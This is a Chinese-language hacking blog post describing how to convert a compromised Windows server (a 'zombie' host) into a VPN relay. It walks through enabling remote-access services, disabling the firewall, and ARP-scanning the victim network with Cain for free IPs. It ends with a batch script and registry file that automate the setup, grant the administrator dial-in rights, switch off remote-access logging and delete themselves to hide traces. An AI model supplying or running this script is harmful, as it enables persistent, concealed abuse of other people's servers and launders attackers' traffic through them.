作者:Black
信息来源:Black's blog(http://hi.baidu.com/0x4i)
请大家发帖时附上原版权!
首先,准备好用到的刀具,为你的小鸡开刀吧!
物品:公网服务器一台,Cain4.9,鼠标and键盘,主机,显示屏,
好了不废话了,开始吧!
登陆服务器(肉鸡),点击开始>运行>输入services.msc
寻找如下服务名称!
Workstation
Telephony
Remote Access Connection Manager
Remote Access Auto Connection Manager
remote Registry
Server
Routing and Remote Access
要停止 或允许1723端口
设置启动类型为自动,并启动!
关闭以下服务并禁用:
Windows Firewall/Internet Connection Sharing (ICS)
服务设置好了接下来就开始寻找空IP段。
安装Cain4.9 并运行。点击黄色按钮。选择嗅探器。
在IP地址下面右键扫描MAC地址。默认点确定。开始扫描IP。扫描到如下IP:
在这里可以看到选中的地方,116-120 有段空的IP没被用,大家可以PING一下。
记录下IP段 XXX.XXX.228.117 ---- XXX.XXX.228.119
因为VPN用一个空IP做服务器另一个用来给客户端,我们挑选有2个空IP以上的段。
现在开始配置VPN了。
点击开始>运行>输入>rrasmgmt.msc
右键选中地方,点击>配置并启用路由和远程访问(C)
点击>下一步.>自定义配置>选着VPN访问>下一步>完成。
右键选中地方,属性。
选IP,静态地址池>添加>填上我们刚才记录下的空IP段>确定!
下一步。选中常规。点击新增路由协议。添加NAT/基本防火墙.。确定。
选中NAT/基本防火墙右键>新增接口.
选择公网的网卡。确定。不知道的可以用CMD>IPCONFIG,查看一下。
确定后你会看到如下图。并与下图选择配置。
确定。大功告成。
接下来就是配置一个自己的VPN账户了。
计算机管理→本地用户和组--用户 选一个要拨入的用户 点 右键 属性 拨入选项卡 选允许拨入 确定
VPN就基本设置就完成了
网上邻居 右键属性 新建连接向导 下一步 选‘连接到我的工作场所的网络’
下一步 选虚拟网络专用连接 随便输入一个公司名 下一步 输入服务器IP或(域名) 完成
输入刚刚设置的拨入用户 连接进去之后
在CMD下输入 IPCONFIG -ALL 可以发现多了一个IP地址了
去www.ip138.com先看下没连接VPN之前的IP
用VPN连接之后在看看IP
一个公网VPN就建立好了。
不想传太多的图了。浪费国家资源嘛。
如果在不懂的我也很无语了。PM我吧!
最后还是留下一个内网VPN自动建立的。会批处理的童鞋可以改改。
vpn.bat
@echo off
net stop sharedaccess
sc config sharedaccess start= disabled
sc config remoteaccess start= auto
net start remoteaccess
sc config lanmanworkstation start= auto
net start lanmanworkstation
netsh ras set user administrator permit
netsh ras ip add range 10.0.0.1 10.0.0.100
netsh ras ip set addrassign pool
netsh routing ip nat install
netsh routing ip nat add interface 本地连接 full
netsh routing ip nat add interface internal private
netsh routing ip igmp install
netsh routing ip igmp add interface internal igmpprototype=IGMPRTRV2 ifenabled=enable robustvar=2 startupquerycount=2 startupqueryinterval=31 genqueryinterval=125 genqueryresptime=10 lastmemquerycount=2 lastmemqueryinterval=1000 accnonrtralertpkts=YES
netsh routing ip igmp add interface name="本地连接" igmpprototype=IGMPPROXY ifenabled=enable
regedit -s vpn.reg
del vpn.reg
del %0%
vpn.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters]
ProhibitIPsec"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters]
LoggingFlags"=dword:00000000
[-HKEY_CLASSES_ROOT\Interface\{0000010c-0000-0000-C000-000000000046}]